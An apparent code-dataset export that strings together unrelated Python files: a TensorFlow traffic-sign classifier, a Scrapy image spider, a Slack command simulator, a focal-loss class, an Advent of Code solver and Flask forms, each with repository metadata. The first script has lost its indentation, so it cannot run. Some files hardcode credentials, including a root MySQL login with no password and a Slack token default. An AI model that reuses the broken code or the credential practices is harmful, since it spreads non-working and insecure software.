########################DISABLE TENSORFLOW WARNING###############
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
#################################################################
#########################DATABASE################################
import MySQLdb as my
db = my.connect("127.0.0.1","root","","pythondb")
cursor = db.cursor()
sql = "UPDATE `task` SET value = 0 WHERE slno=1;"
cursor.execute(sql)
db.commit()
cursor = db.cursor()
sql = "select epoch from `epoch` where id=1;"
cursor.execute(sql)
result= cursor.fetchall()
for row in result:
EPOCHS = row[0]
#########################END-DATABASE#######################################
# Load pickled data
import pickle
# TODO: Fill this in based on where you saved the training and testing data
training_file = "train.p"
validation_file= "valid.p"
testing_file = "test.p"
with open(training_file, mode='rb') as f:
train = pickle.load(f)
with open(validation_file, mode='rb') as f:
valid = pickle.load(f)
X_train, y_train = train['features'], train['labels']
X_valid, y_valid = valid['features'], valid['labels']
############################################################################
# ---
#
# ## Dataset Summary & Exploration
#
# The pickled data is a dictionary with 4 key/value pairs:
# - 'features'
# - 'labels'
############################################################################
#### About Data#####
import numpy as np
# Number of training examples
n_train = X_train.shape[0]
# shape of an traffic sign images
image_shape = X_train.shape[1:]
# How many unique classes/labels there are in the dataset.
n_classes = len(np.unique(y_train))
print("Number of training examples =", n_train)
print("Image data shape =", image_shape)
print("Number of classes =", n_classes)
###################### Visualization of the dataset#########################
##FINAL PLOT OF GRAPH ####
import matplotlib.pyplot as plt
import random
z=50
def plot_figures(figures, nrows=1, ncols=1, labels=None):
    """Plot a dict of images on one grid and save it under images/ratio/.

    Parameters
    ----------
    figures : dict mapping title -> image array (shown with a gray colormap)
    nrows, ncols : grid layout for the subplots
    labels : optional list of subplot titles; falls back to the dict keys

    Uses (and increments) the module-level counter ``z`` to build a
    unique output filename.
    """
    global z  # declared up front: this function both reads and rebinds z
    fig, axs = plt.subplots(ncols=ncols, nrows=nrows, figsize=(12, 2))
    axs = axs.ravel()
    for index, title in zip(range(len(figures)), figures):
        axs[index].imshow(figures[title], plt.gray())
        if labels is not None:  # idiomatic identity check (was `!= None`)
            axs[index].set_title(labels[index])
        else:
            axs[index].set_title(title)
        axs[index].set_axis_off()
    plt.tight_layout()
    kurs = "images/ratio/%i.png" % z
    z = z + 1
    plt.savefig(kurs, format='png')
#############################################################################
name_values = np.genfromtxt('signnames.csv', skip_header=1, dtype=[('myint','i8'), ('mysring','S55')], delimiter=',')
unique_train, counts_train = np.unique(y_train, return_counts=True)
plt.rcParams["figure.figsize"] = [12, 5]
axes = plt.gca()
axes.set_xlim([-1,43])
plt.bar(unique_train, counts_train)
plt.grid()
plt.title("Train Dataset Sign Counts(Original)")
plt.savefig('./images/data/1.png')
plt.clf()
unique_valid, counts_valid = np.unique(y_valid, return_counts=True)
plt.bar(unique_valid, counts_valid)
plt.rcParams["figure.figsize"] = [12, 5]
axes = plt.gca()
axes.set_xlim([-1,43])
plt.grid()
plt.title("Valid Dataset Sign Counts(Original)")
plt.savefig('./images/data/2.png')
plt.clf()
###################Generate fake data####################################
############ Augumentation and greyscale the image#######################
### Preprocess the data here. Preprocessing steps could include normalization, converting to grayscale, etc.
import tensorflow as tf
from tensorflow.contrib.layers import flatten
from sklearn.utils import shuffle
X_train_rgb = X_train
X_train_gray = np.sum(X_train/3, axis=3, keepdims=True)
X_valid_rgb = X_valid
X_valid_gray = np.sum(X_valid/3, axis=3, keepdims=True)
# Store the Greyscale images as the training, testing and validation data
X_train = X_train_gray
X_valid = X_valid_gray
# Test the data availabe so that we can see that data had been greyscaled
image_depth_channels = X_train.shape[3]
### Augumentation (Make Duplicate data)
import cv2
more_X_train = []
more_y_train = []
more2_X_train = []
more2_y_train = []
new_counts_train = counts_train
#print(new_counts_train)
for i in range(n_train):
if(new_counts_train[y_train[i]] < 3000):
for j in range(3):
# cv2.warpAffine crops the input image
dx, dy = np.random.randint(-1.7, 1.8, 2)
M = np.float32([[1, 0, dx], [0, 1, dy]])
dst = cv2.warpAffine(X_train[i], M, (X_train[i].shape[0], X_train[i].shape[1]))
dst = dst[:,:,None]
more_X_train.append(dst)
more_y_train.append(y_train[i])
#cv2.getPerspectiveTransform ,transforms and saves
random_higher_bound = random.randint(27, 32)
random_lower_bound = random.randint(0, 5)
points_one = np.float32([[0,0],[32,0],[0,32],[32,32]])
points_two = np.float32([[0, 0], [random_higher_bound, random_lower_bound], [random_lower_bound, 32],[32, random_higher_bound]])
M = cv2.getPerspectiveTransform(points_one, points_two)
dst = cv2.warpPerspective(X_train[i], M, (32,32))
more2_X_train.append(dst)
more2_y_train.append(y_train[i])
#cv2.getRotationMatrix2D rotates the image
tilt = random.randint(-12, 12)
M = cv2.getRotationMatrix2D((X_train[i].shape[0]/2, X_train[i].shape[1]/2), tilt, 1)
dst = cv2.warpAffine(X_train[i], M, (X_train[i].shape[0], X_train[i].shape[1]))
more2_X_train.append(dst)
more2_y_train.append(y_train[i])
new_counts_train[y_train[i]] += 2
more_X_train = np.array(more_X_train)
more_y_train = np.array(more_y_train)
X_train = np.concatenate((X_train, more_X_train), axis=0)
y_train = np.concatenate((y_train, more_y_train), axis=0)
more2_X_train = np.array(more_X_train)
more2_y_train = np.array(more_y_train)
more2_X_train = np.reshape(more2_X_train, (np.shape(more2_X_train)[0], 32, 32, 1))
X_train = np.concatenate((X_train, more2_X_train), axis=0)
y_train = np.concatenate((y_train, more2_y_train), axis=0)
X_train = np.concatenate((X_train, X_valid), axis=0)
y_train = np.concatenate((y_train, y_valid), axis=0)
from sklearn.model_selection import train_test_split
X_train, X_valid, y_train, y_valid = train_test_split(X_train, y_train, test_size=0.2, random_state=0)
print("New Dataset Size : {}".format(X_train.shape[0]))
unique, counts = np.unique(y_train, return_counts=True)
# Plot the histogram
plt.rcParams["figure.figsize"] = [12, 5]
axes = plt.gca()
axes.set_xlim([-1,43])
plt.bar(unique, counts)
plt.grid()
plt.title("Train Dataset Sign Counts(After)")
plt.savefig('./images/data/3.png')
plt.clf()
unique, counts = np.unique(y_valid, return_counts=True)
# Plot the histogram
plt.rcParams["figure.figsize"] = [12, 5]
axes = plt.gca()
axes.set_xlim([-1,43])
plt.bar(unique, counts)
plt.grid()
plt.title("Valid Dataset Sign Counts(After)")
plt.savefig('./images/data/4.png')
plt.clf()
X_train_normalized = X_train/127.5-1
##########NORMALIZE TRAINING DATASET###########
X_train = X_train_normalized
###############################################
##### Model Architecture#####
#
# My final model consisted of the following layers:
#
# | Layer | Description |
# |:---------------------:|:---------------------------------------------:|
# | Input | 32x32x1 grayscale image |
# | Convolution 5x5 | 2x2 stride, valid padding, outputs 28x28x6 |
# | RELU | |
# | Max pooling | 2x2 stride, outputs 14x14x6 |
# | Convolution 5x5 | 2x2 stride, valid padding, outputs 10x10x16 |
# | RELU | |
# | Max pooling | 2x2 stride, outputs 5x5x16 |
# | Convolution 1x1 | 2x2 stride, valid padding, outputs 1x1x412 |
# | RELU | |
# | Fully connected | input 412, output 122 |
# | RELU | |
# | Dropout | 50% keep |
# | Fully connected | input 122, output 84 |
# | RELU | |
# | Dropout | 50% keep |
# | Fully connected | input 84, output 43 |
#
#define basic property of a layer
def conv2d(x, W, b, strides=1):
    """Conv(VALID padding) -> bias -> ReLU building block.

    Prints the pre-activation tensor shape as a debugging aid and
    returns the activated tensor.
    """
    x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='VALID')
    x = tf.nn.bias_add(x, b)
    print(x.shape)
    return tf.nn.relu(x)
def LeNet(x):
    """Build the modified-LeNet classifier graph for 32x32x1 inputs.

    Pipeline: conv5x5+pool (28x28x6 -> 14x14x6), conv5x5+pool
    (10x10x16 -> 5x5x16), conv5x5 to 1x1x412, then fully connected
    412 -> 122 -> 84 -> 43 with dropout (module-level ``keep_prob``)
    on the two hidden FC layers.  Returns unscaled logits; softmax is
    applied later inside the loss op.
    """
    mu = 0       # weight-init mean
    sigma = 0.1  # weight-init standard deviation
    # Conv block 1: 32x32x1 -> 28x28x6, max-pool to 14x14x6.
    W_one = tf.Variable(tf.truncated_normal(shape=(5, 5, image_depth_channels, 6), mean = mu, stddev = sigma))
    b_one = tf.Variable(tf.zeros(6))
    layer_one = conv2d(x, W_one, b_one, 1)
    layer_one = tf.nn.max_pool(layer_one, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')
    print(layer_one.shape)
    print()
    # Conv block 2: 14x14x6 -> 10x10x16, max-pool to 5x5x16.
    W_two = tf.Variable(tf.truncated_normal(shape=(5, 5, 6, 16), mean = mu, stddev = sigma))
    b_two = tf.Variable(tf.zeros(16))
    layer_two = conv2d(layer_one, W_two, b_two, 1)
    layer_two = tf.nn.max_pool(layer_two, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')
    print(layer_two.shape)
    print()
    # Conv block 3: 5x5x16 -> 1x1x412 (acts like a fully connected layer).
    W_two_a = tf.Variable(tf.truncated_normal(shape=(5, 5, 16, 412), mean = mu, stddev = sigma))
    b_two_a = tf.Variable(tf.zeros(412))
    layer_two_a = conv2d(layer_two, W_two_a, b_two_a, 1)
    print(layer_two_a.shape)
    print()
    flat = flatten(layer_two_a)
    # FC 412 -> 122 with ReLU + dropout.
    W_three = tf.Variable(tf.truncated_normal(shape=(412, 122), mean = mu, stddev = sigma))
    b_three = tf.Variable(tf.zeros(122))
    layer_three = tf.nn.relu(tf.nn.bias_add(tf.matmul(flat, W_three), b_three))
    layer_three = tf.nn.dropout(layer_three, keep_prob)
    # FC 122 -> 84 with ReLU + dropout.
    W_four = tf.Variable(tf.truncated_normal(shape=(122, 84), mean = mu, stddev = sigma))
    b_four = tf.Variable(tf.zeros(84))
    layer_four = tf.nn.relu(tf.nn.bias_add(tf.matmul(layer_three, W_four), b_four))
    layer_four = tf.nn.dropout(layer_four, keep_prob)
    # Output layer: 84 -> 43 logits (no activation here).
    W_five = tf.Variable(tf.truncated_normal(shape=(84, 43), mean = mu, stddev = sigma))
    b_five = tf.Variable(tf.zeros(43))
    layer_five = tf.nn.bias_add(tf.matmul(layer_four, W_five), b_five)
    return layer_five
x = tf.placeholder(tf.float32, (None, 32, 32, image_depth_channels))
y = tf.placeholder(tf.int32, (None))
one_hot_y = tf.one_hot(y, 43)
keep_prob = tf.placeholder(tf.float32)
### Train your model here.
BATCH_SIZE = 256
train=1
rate = 0.00097
print()
print("CNN Structure details ")
##CALL CNN##
logits = LeNet(x)
############
cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=one_hot_y)
loss_operation = tf.reduce_mean(cross_entropy)
optimizer = tf.train.AdamOptimizer(learning_rate = rate)
training_operation = optimizer.minimize(loss_operation)
correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))
accuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
saver = tf.train.Saver()
def evaluate(X_data, y_data):
    """Return the model's mean accuracy over (X_data, y_data).

    Runs the module-level ``accuracy_operation`` batch by batch inside
    the default TF session (dropout disabled via keep_prob=1.0) and
    weights each batch's accuracy by its size, so the last partial
    batch is handled correctly.
    """
    num_examples = len(X_data)
    total_accuracy = 0
    sess = tf.get_default_session()
    for offset in range(0, num_examples, BATCH_SIZE):
        batch_x, batch_y = X_data[offset:offset+BATCH_SIZE], y_data[offset:offset+BATCH_SIZE]
        accuracy = sess.run(accuracy_operation, feed_dict={x: batch_x, y: batch_y, keep_prob: 1.0})
        total_accuracy += (accuracy * len(batch_x))
    return total_accuracy / num_examples
# In[15]:
#if train==1:
# Training loop: shuffle each epoch, run mini-batch SGD (dropout 0.5),
# then record validation/train accuracy per epoch and save the model.
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    num_examples = len(X_train)
    print("Training...")
    print()
    validation_accuracy_figure = []
    test_accuracy_figure = []
    for i in range(EPOCHS):
        X_train, y_train = shuffle(X_train, y_train)
        for offset in range(0, num_examples, BATCH_SIZE):
            end = offset + BATCH_SIZE
            batch_x, batch_y = X_train[offset:end], y_train[offset:end]
            sess.run(training_operation, feed_dict={x: batch_x, y: batch_y, keep_prob: 0.5})
        # Per-epoch metrics (dropout disabled inside evaluate()).
        validation_accuracy = evaluate(X_valid, y_valid)
        validation_accuracy_figure.append(validation_accuracy)
        test_accuracy = evaluate(X_train, y_train)
        test_accuracy_figure.append(test_accuracy)
        print("EPOCH {} ...".format(i+1))
        print("Test Accuracy = {:.3f}".format(test_accuracy))
        print("Validation Accuracy = {:.3f}".format(validation_accuracy))
        print()
    # Persist the trained weights as ./lenet checkpoint files.
    saver.save(sess, './lenet')
    print("Model saved")
# In[16]:
plt.plot(test_accuracy_figure)
plt.title("Test Accuracy")
plt.savefig('./images/data/5.png')
plt.clf()
plt.plot(validation_accuracy_figure)
plt.title("Validation Accuracy")
plt.savefig('./images/data/6.png')
plt.clf()
#########################DATABASE##############################
sql = "UPDATE `task` SET value = 1 WHERE slno=1;"
number_of_rows = cursor.execute(sql)
db.commit()
db.close()
#########################End-DATABASE###########################
| [
"anoop.jain10@gmail.com"
] | anoop.jain10@gmail.com |
7ba8883b6f3aaf6ba8363fae014f52cb60c0c1e6 | 5962cf5c30d69b4b57d2ec598e11c3a81c6df083 | /old/bokeh_test.py | da0f6baf6bf94ea0b5d50813736a240e7fb2c59d | [] | no_license | sergeimoiseev/othodi_code | 1584f4006c2bddd8ddbbc6e7439b782c1f93c313 | 87f11374fc1f332752d426af4e047306aefcbd81 | refs/heads/master | 2021-01-10T04:17:45.407696 | 2016-01-26T20:23:59 | 2016-01-26T20:23:59 | 48,580,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | # to run by anaconda
# Minimal Bokeh demo: scatter five points into a static HTML file.
from bokeh.plotting import figure, output_file, show
# output to static HTML file
output_file("line.html")
p = figure(plot_width=400, plot_height=400)
# add a circle renderer with a size, color, and alpha
p.circle([1, 2, 3, 4, 5], [6, 7, 2, 4, 5], size=20, color="navy", alpha=0.5)
# show the results (opens line.html in the default browser)
show(p) | [
"moiseev.sergei@gmail.com"
] | moiseev.sergei@gmail.com |
24e55b3eef2abf192a91eb4a60e24d8054fbe7e2 | 3136d9d701ac77d252e277e5acad470b0ca8deb0 | /Spider/jsonspider/jsonspider/spiders/MySpider.py | 4617a4da54f64c1373365916dc7a2a2f7f30f6d3 | [] | no_license | ahathe/scrapy-project-from-python | 6947f43b97ac37f6749ddc96d42500e038f64a58 | f68890764145badca7e5897353100cf54e8dfa92 | refs/heads/master | 2021-06-23T00:28:16.145088 | 2017-09-05T00:34:30 | 2017-09-05T00:34:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | #!/usr/bin/env python
import scrapy
class MySpider(scrapy.Spider):
    """Scrape image URLs from a meitulu.com gallery, following pagination."""
    name = 'MySpider'
    start_urls = [
        'http://www.meitulu.com/item/3583.html',
    ]

    def parse(self, response):
        """Yield every image source on the page, then follow the last
        anchor under ``//center`` (the next-page link) when present."""
        for each in response.xpath('//center//img'):
            yield {
                'jpg': each.xpath('@src').extract()
            }
        # Bug fix: the original did ``extract()[-1]`` unconditionally, which
        # raises IndexError on pages without links, and then compared the
        # result to None -- a check that could never be False.
        links = response.xpath('//center//a/@href').extract()
        if links:
            yield response.follow(links[-1], callback=self.parse)
| [
"1136334598@qq.com"
] | 1136334598@qq.com |
74fd5c72a4cf6b86e44f4ce27f4c5ce2a46d3f83 | b7dd43c7c22b46ea752b9f27556a0bc2785c4db5 | /SnapDragon/PyScripts/_2.py | fce9d9fa954f8392ec239d76045ca313f1f04d52 | [] | no_license | Visin1991/Python_DataAnalysis | ed3a264da2055308d05baa74265d2e8a4880fead | bfeca765df0c2b6c3ad5dd01160c14b56d6cd616 | refs/heads/master | 2020-11-29T07:21:24.029111 | 2019-12-25T12:53:53 | 2019-12-25T12:53:53 | 230,056,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 796 | py | import tkinter as tk
from tkinter import ttk
#======================
# Create the root window
#======================
win = tk.Tk()
#======================
# Add a window title
#======================
win.title("Python GUI")
#=============================================================
# Adding a LabelFrame and a Button
#=============================================================
lFrame = ttk.LabelFrame(win, text="Python GUI Programming Cookbook")
lFrame.grid(column=0, row=0, sticky='WE', padx=10, pady=10)
def clickMe():
    # Local import: messagebox is only needed inside this callback.
    from tkinter import messagebox
    messagebox.showinfo('Message Box', 'Hi from same Level.')
button = ttk.Button(lFrame, text="Click Me ", command=clickMe)
button.grid(column=1, row=0, sticky=tk.S)
#======================
# Start the event loop
#======================
win.mainloop() | [
"zhuzhanhao1991@gmail.com"
] | zhuzhanhao1991@gmail.com |
9775bc6bd071f66fbb05d218a99381b23510f116 | be73248aa4f1171e81b65cf955c4bd6110d56095 | /request_test.py | 353ec800d3b9bd9c0e3797743ad8a33355ced72f | [] | no_license | rogerhoward/lambot | 781c158e58bd71e2f3eb480aab31f181aee55e62 | d5588041fc92b779ba88479d8657f9b8a4916692 | refs/heads/development | 2022-02-18T05:03:23.911978 | 2017-06-22T03:22:11 | 2017-06-22T03:22:11 | 86,493,856 | 1 | 1 | null | 2022-02-04T15:04:55 | 2017-03-28T18:30:43 | Python | UTF-8 | Python | false | false | 2,137 | py | #!/usr/bin/env python
import os
import requests
from pprint import pprint
import click
@click.command()
@click.option('--token', default='gIkuvaNzQIHg97ATvDxqgjtO', help='Slack API token.')
@click.option('--team_id', default='T0001', help='The unique Slack team ID')
@click.option('--team_domain', default='example', help='The unique Slack domain')
@click.option('--channel_id', default='C2147483705', help='The unique ID of the channel where this command originated')
@click.option('--channel_name', default='bot', help='The name of the channel where this command originated')
@click.option('--user_id', default='U2147483697', help='The unique ID of the user who sent this command')
@click.option('--user_name', default='rogerhoward', help='The username of the user who sent this command.')
@click.option('--command', default='/lambot', help='The slash command name')
@click.option('--text', default='calendar', help='All text that followed the slash command - generally options and modifiers')
@click.option('--response_url', default='http://0.0.0.0:5000/test/response', help='The URL where to POST the response(s) - up to five responses may be POSTed to this Webhook')
@click.option('--url', default='http://0.0.0.0:5000/', help='The URL where to POST the initial Slack command payload')
def run(token, team_id, team_domain, channel_id, channel_name, user_id, user_name, command, text, response_url, url ):
    """
    Simulates the Slack client by posting a standard Slack payload to the bot endpoint. The URL of the endpoint as well as all values in the payload can be overriden using command line options. The payload format is documented at https://api.slack.com/slash-commands#triggering_a_command
    """
    # Build the form payload exactly as Slack's slash-command POST would;
    # ``url`` itself is the request target and is deliberately not a field.
    data = {'token': token,
            'team_id': team_id,
            'team_domain': team_domain,
            'channel_id': channel_id,
            'channel_name': channel_name,
            'user_id': user_id,
            'user_name': user_name,
            'command': command,
            'text': text,
            'response_url': response_url}
    requests.post(url, data=data)
if __name__ == '__main__':
    run()
| [
"rogerhoward@mac.com"
] | rogerhoward@mac.com |
7fd4b8acc7c9c38677a8256d3556db119b6fe7c8 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/create_tests/create_tst_class.expected_pytest_2k.py | 327ec499b4f492f406f449db0fb397764f8ae8eb | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 111 | py | class Spam(object):
    def eggs(self):
        # Stub body: always fails (fixture content -- keep byte-stable).
        assert False
    def eggs_and_ham(self):
        # Stub body: always fails (fixture content -- keep byte-stable).
        assert False
| [
"intellij-monorepo-bot-no-reply@jetbrains.com"
] | intellij-monorepo-bot-no-reply@jetbrains.com |
de16d449e03f06649bdd0c13a00277d28cff3652 | 602b908caf567162845b7ac34afc6beb5969b8c9 | /AOC_PY/days/day04.py | 3b399dc67b48357bf9699fc9e7ac494631692542 | [] | no_license | matusmrazik/AdventOfCode2020 | 39cae721d1203f9c59740a2bd132abb534f3f952 | 86d300b9e96ca3a764f1ec7de3f60249f69134d0 | refs/heads/main | 2023-02-05T02:55:37.463297 | 2020-12-28T13:51:35 | 2020-12-28T13:51:35 | 318,509,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,047 | py | import os
import re
INPUT_PATH = os.path.join(os.path.dirname(__file__), '../../Inputs', 'day04.txt')
def validate_field(name: str, value: str):
    """Return True when ``value`` satisfies the rule for passport field ``name``.

    Fields with no known rule (e.g. 'cid') are always accepted.
    """
    rules = {
        'byr': r'^(19[2-9][0-9]|200[0-2])$',                          # 1920-2002
        'iyr': r'^(201[0-9]|2020)$',                                  # 2010-2020
        'eyr': r'^(202[0-9]|2030)$',                                  # 2020-2030
        'hgt': r'^(1[5-8][0-9]cm|19[0-3]cm|59in|6[0-9]in|7[0-6]in)$', # 150-193cm / 59-76in
        'hcl': r'^(#[0-9a-f]{6})$',
        'ecl': r'^(amb|blu|brn|gry|grn|hzl|oth)$',
        'pid': r'^(\d{9})$',
    }
    pattern = rules.get(name)
    if pattern is None:
        return True
    return re.match(pattern, value) is not None
class Day04:
    """Advent of Code 2020 day 4: count valid passports."""

    def __init__(self):
        """Load the puzzle input and split it into per-passport token lists."""
        # Passports are separated by blank lines; each becomes a flat list of
        # alternating field-name / value tokens.
        with open(INPUT_PATH, 'r') as infile:
            blocks = infile.read().split('\n\n')
        self.passports = [re.split(r'\n| |:', block.strip()) for block in blocks]

    def solve1(self):
        """Part 1: passports carrying every required field ('cid' is optional)."""
        required = {'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid'}
        return sum(
            1 for passport in self.passports
            if required <= {passport[i] for i in range(0, len(passport), 2)}
        )

    def solve2(self):
        """Part 2: passports whose fields are all present and individually valid."""
        required = {'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid'}
        count = 0
        for passport in self.passports:
            seen = set()
            all_valid = True
            for pos in range(0, len(passport), 2):
                field, value = passport[pos], passport[pos + 1]
                if not validate_field(field, value):
                    all_valid = False
                    break
                seen.add(field)
            if all_valid and required <= seen:
                count += 1
        return count
def main():
    """Solve both puzzle parts and print the answers in order."""
    solver = Day04()
    for answer in (solver.solve1(), solver.solve2()):
        print(answer)


if __name__ == '__main__':
    main()
| [
"matus.mrazik2@gmail.com"
] | matus.mrazik2@gmail.com |
c2cd0da87716a6c9fe21cade4cc83fb2007f479d | ebc7607785e8bcd6825df9e8daccd38adc26ba7b | /python/baekjoon/2.algorithm/brute_force/백준_감소하는_수.py | b4b9f0e4b6dd253325d331cce5183803d908e65f | [] | no_license | galid1/Algorithm | 18d1b72b0d5225f99b193e8892d8b513a853d53a | 5bd69e73332f4dd61656ccdecd59c40a2fedb4b2 | refs/heads/master | 2022-02-12T07:38:14.032073 | 2022-02-05T08:34:46 | 2022-02-05T08:34:46 | 179,923,655 | 3 | 0 | null | 2019-06-14T07:18:14 | 2019-04-07T05:49:06 | Python | UTF-8 | Python | false | false | 571 | py | import sys
def dfs(cur_num, limit):
    """Build strictly decreasing digit strings of length ``limit``.

    Every completed string bumps the global counter ``idx``; when the
    ``n``-th one (0-indexed) is produced the answer is printed and the
    process exits via ``sys.exit()``.
    """
    global answer, idx, n, answers
    # base case: the number reached the target length
    if len(cur_num) == limit:
        idx += 1
        answers.append(cur_num)
        # the n-th decreasing number has been found
        if idx == n:
            print(cur_num)
            sys.exit()
        return
    if not cur_num:
        # first digit: any of 0-9
        for i in range(10):
            dfs(str(i), limit)
    else:
        # subsequent digits must be strictly smaller than the previous one
        for j in range(int(cur_num[-1])):
            dfs(cur_num + str(j), limit)
# Global search state shared with dfs(): ``idx`` counts generated numbers.
# NOTE(review): ``answer`` is declared global in dfs but never used.
answer, idx = 0, -1
answers = []
n = int(sys.stdin.readline())
# Try every possible length; a strictly decreasing number has at most 10 digits.
for i in range(1, 11):
    dfs('', i)
print(-1) | [
"galid1@naver.com"
] | galid1@naver.com |
2f06ed76fa47c4244dbaeecb75147c3f68f79bde | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/29/usersdata/67/9081/submittedfiles/atividade.py | a1a123328be3fb4dd0cf7fd77b88a631cf61ee74 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
n = int(input("Digite o valor de n:"))
contador = 0
i = 1
while (i <= n):
    # Syntax fix: the submitted code read ``n//10=!0``, which is invalid
    # Python; the intended inequality operator is ``!=``.
    # NOTE(review): the condition never changes inside the loop, so this
    # counts n whenever n >= 10 and 0 otherwise -- confirm the intended
    # logic (digit counting would require updating n each iteration).
    if n // 10 != 0:
        contador = contador + 1
    i = i + 1
print(contador)
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
0f2f7ee10782ae1ea20dac49abf367a2909b2920 | 7578f8752ea9693c9b2bcca1b4f4bddb74ea4c4b | /projector/projections.py | bb0223ddd257c754cf518486cd794b58e3a14024 | [
"MIT"
] | permissive | SixiemeEtage/projector | 5ade66f8932c5905619518b6df4cf6fc460bd040 | 6d6b2488322556b1cd71eafc7d784787aca331bd | refs/heads/master | 2021-01-19T08:48:41.375749 | 2019-03-17T13:52:06 | 2019-03-17T14:06:54 | 81,648,850 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | import libprojector
# String identifiers used to select a projection implementation.
PROJECTION_EQUIRECTANGULAR = 'equirectangular'
PROJECTION_CUBEMAP = 'cubemap'
class BaseProj(object):
    """Shared state for projection builders.

    Concrete subclasses override :meth:`get_projection` to return the
    corresponding libprojector projection object.
    """

    def __init__(self, image_width, options):
        # Target image width in pixels plus a dict of per-projection options.
        self.image_width = image_width
        self.options = options

    def get_projection(self):
        """Build the projection object; subclasses must override this."""
        raise NotImplementedError
class EquirectangularProj(BaseProj):
    """Equirectangular (spherical) projection: 2:1 width-to-height ratio."""

    def get_projection(self):
        # The output image is exactly half as tall as it is wide.
        return libprojector.SphericalProjection(
            int(self.image_width), int(self.image_width / 2))
class CubemapProj(BaseProj):
    """Cubemap projection: six faces, each one sixth of the image width."""

    def get_projection(self):
        # 'border_padding' (default 0) adds extra pixels around each face.
        padding = self.options.get('border_padding', 0)
        return libprojector.CubemapProjection(int(self.image_width / 6), padding)
# Lookup table: projection identifier -> builder class.
PROJECTION_CLASSES = {
    PROJECTION_EQUIRECTANGULAR: EquirectangularProj,
    PROJECTION_CUBEMAP: CubemapProj,
}
| [
"dulacpier@gmail.com"
] | dulacpier@gmail.com |
60ca98b589589149ef509f9d010525f46acc8ff8 | 5e773def7273c9a082392e1980548114f15e5675 | /Focalloss.py | 25477a475cb72f608dd02c1090ebf41268cefe59 | [] | no_license | lihuaqiang0101/Hourglass | 77ebbf9faef506492a1949f20766b4c1dce3bc18 | 32fc92b0d2e889999c4a58eb26726b1f065f85c8 | refs/heads/master | 2022-10-01T11:47:02.885662 | 2020-06-05T08:41:41 | 2020-06-05T08:41:41 | 269,575,253 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | from torch import nn
import torch.nn.functional as F
import torch
class FocalLoss(nn.Module):
    """Binary focal loss (Lin et al., "Focal Loss for Dense Object Detection").

    Down-weights well-classified examples so training focuses on hard ones:
    ``FL = alpha * (1 - pt) ** gamma * BCE`` where ``pt`` is the model's
    probability of the true class.

    Args:
        alpha: scalar weight applied to every element's loss.
        gamma: focusing exponent; 0 reduces this to plain BCE.
        logits: if True, ``inputs`` are raw scores and BCE-with-logits is
            used; otherwise ``inputs`` must be probabilities in [0, 1].
        reduce: if True return the mean loss, otherwise per-element losses.
    """

    def __init__(self, alpha=1, gamma=2, logits=False, reduce=True):
        super(FocalLoss, self).__init__()
        self.alpha = alpha
        self.gamma = gamma
        self.logits = logits
        self.reduce = reduce

    def forward(self, inputs, targets):
        """Compute the focal loss between ``inputs`` and binary ``targets``."""
        # ``reduction='none'`` keeps per-element losses; the deprecated
        # ``reduce=False`` keyword used previously maps to exactly this
        # behaviour but emits warnings on current PyTorch.
        if self.logits:
            bce = F.binary_cross_entropy_with_logits(inputs, targets, reduction='none')
        else:
            bce = F.binary_cross_entropy(inputs, targets, reduction='none')
        pt = torch.exp(-bce)  # probability assigned to the true class
        focal = self.alpha * (1 - pt) ** self.gamma * bce
        if self.reduce:
            return torch.mean(focal)
        return focal
"noreply@github.com"
] | lihuaqiang0101.noreply@github.com |
042e915a0a2df5f868aa3256ebaf6bbfe36e22db | 3193bf23c578bbb5373e574fb61e3cd8df1fcd37 | /app/main/forms.py | c319d6fe64458b1f16f2665f2cd1a6fc6f550ef4 | [] | no_license | chouhui/Flasky | 73ceefbe4424428abba895944322efa13604e632 | c524fe68a5ced729d3fb6d8e929d30d6d6a32c28 | refs/heads/master | 2021-09-09T05:51:57.770748 | 2018-03-14T02:29:30 | 2018-03-14T02:29:30 | 125,138,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,259 | py | from flask_wtf import FlaskForm, Form
from wtforms import StringField, SubmitField, TextAreaField, BooleanField, SelectField, ValidationError
from wtforms.validators import DataRequired, Length, Email, Required, Regexp
from flask_pagedown.fields import PageDownField
from ..models import Role, User
class NameForm(FlaskForm):
    # Minimal demo form asking for the visitor's name.
    name = StringField('What is your name?', validators=[DataRequired()])
    submit = SubmitField('Submit')
class EditProfileForm(FlaskForm):
    # Self-service profile editor: optional personal details only.
    name = StringField('Real name', validators=[Length(0, 64)])
    location = StringField('Location', validators=[Length(0, 64)])
